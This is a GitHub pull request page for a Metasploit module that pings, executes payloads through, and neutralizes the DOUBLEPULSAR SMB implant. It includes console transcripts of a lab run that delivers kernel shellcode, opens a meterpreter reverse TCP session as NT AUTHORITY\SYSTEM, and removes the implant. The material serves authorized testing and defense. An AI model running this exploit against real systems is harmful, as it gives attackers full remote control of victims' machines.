Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add DOUBLEPULSAR payload execution and neutralization module #12374

Merged
merged 22 commits into from Oct 1, 2019

Conversation

@wvu-r7
Copy link
Contributor

commented Sep 30, 2019

This module allows defenders and authorized attackers to test code execution against the DOUBLEPULSAR implant. It also allows users to neutralize the implant, preventing code execution unless the target is reinfected or otherwise exploited. This module will not provide the ability to infect a target with the implant, nor does it utilize any Equation Group code.

Pinging the implant

msf5 exploit(windows/smb/doublepulsar_rce) > check

[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[+] 192.168.56.115:445 - The target is vulnerable.
msf5 exploit(windows/smb/doublepulsar_rce) >

Executing a payload

msf5 exploit(windows/smb/doublepulsar_rce) > set target Execute\ payload
target => Execute payload
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.115:445 - Total shellcode length: 4096 bytes
[*] 192.168.56.115:445 - Encrypting shellcode with XOR key 0x33C6DC64
[*] 192.168.56.115:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.115:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.115
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.115:49158) at 2019-09-25 18:26:47 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-S7TDBIENPVM
OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Neutralizing the implant

msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[+] 192.168.56.115:445 - Connected to \\192.168.56.115\IPC$ with TID = 2048
[*] 192.168.56.115:445 - Target OS is Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.56.115:445 - Sending ping to DOUBLEPULSAR
[+] 192.168.56.115:445 - Host is likely INFECTED with DoublePulsar! - Arch: x64 (64-bit), XOR Key: 0x33C6DC64
[*] 192.168.56.115:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.115:445 - Implant neutralization successful
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) >
@busterb

This comment has been minimized.

Copy link
Member

commented Oct 1, 2019

This definitely requires #12377 locally to run reliably, I'll grab them at the same time!

msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:445 - Generating kernel shellcode with windows/x64/meterpreter/reverse_tcp
[*] 192.168.56.101:445 - Encrypting shellcode with XOR key 0xC0C180C2
[*] 192.168.56.101:445 - Sending shellcode to DOUBLEPULSAR
[+] 192.168.56.101:445 - Payload execution successful
[*] Sending stage (206403 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:49157) at 2019-10-01 01:33:54 -0500

meterpreter > exit
[*] Shutting down Meterpreter...

[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf5 exploit(windows/smb/doublepulsar_rce) > set target 
set target 0                    set target 1                    set target Execute\ payload     set target Neutralize\ implant
msf5 exploit(windows/smb/doublepulsar_rce) > set target Neutralize\ implant 
target => Neutralize implant
msf5 exploit(windows/smb/doublepulsar_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444 
[*] 192.168.56.101:445 - Neutralizing DOUBLEPULSAR
[+] 192.168.56.101:445 - Implant neutralization successful

[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/doublepulsar_rce) > 
msf5 exploit(windows/smb/doublepulsar_rce) > check 
[*] 192.168.56.101:445 - The target is not exploitable.
busterb added a commit that referenced this pull request Oct 1, 2019
…dule
@busterb busterb merged commit a1d1303 into rapid7:master Oct 1, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
@busterb

This comment has been minimized.

Copy link
Member

commented Oct 1, 2019

Release Notes

This adds a new module allowing defenders and authorized attackers to test code execution against the DOUBLEPULSAR implant. It also allows users to neutralize the implant, preventing code execution unless the target is reinfected or otherwise exploited. This module will not provide the ability to infect a target with the implant, nor does it utilize any Equation Group code.

@wvu-r7 wvu-r7 deleted the wvu-r7:feature/doublepulsar branch Oct 1, 2019
msjenkins-r7 added a commit that referenced this pull request Oct 2, 2019
…dule
@ronnieflip

This comment has been minimized.

Copy link

commented Oct 4, 2019

Anyone reproduced this yet?
Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (64-bit)

Exploit failed: undefined method `join' for "x64":String

@wvu-r7

This comment has been minimized.

Copy link
Contributor Author

commented Oct 5, 2019

@ronnieflip: How did you install the module? #12377 is the fix for the core bug you're seeing, and it was merged into the tree at the same time as this PR.

@ronnieflip

This comment has been minimized.

Copy link

commented Oct 5, 2019

Updated the PR and it worked fine. Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
4 participants
You can’t perform that action at this time.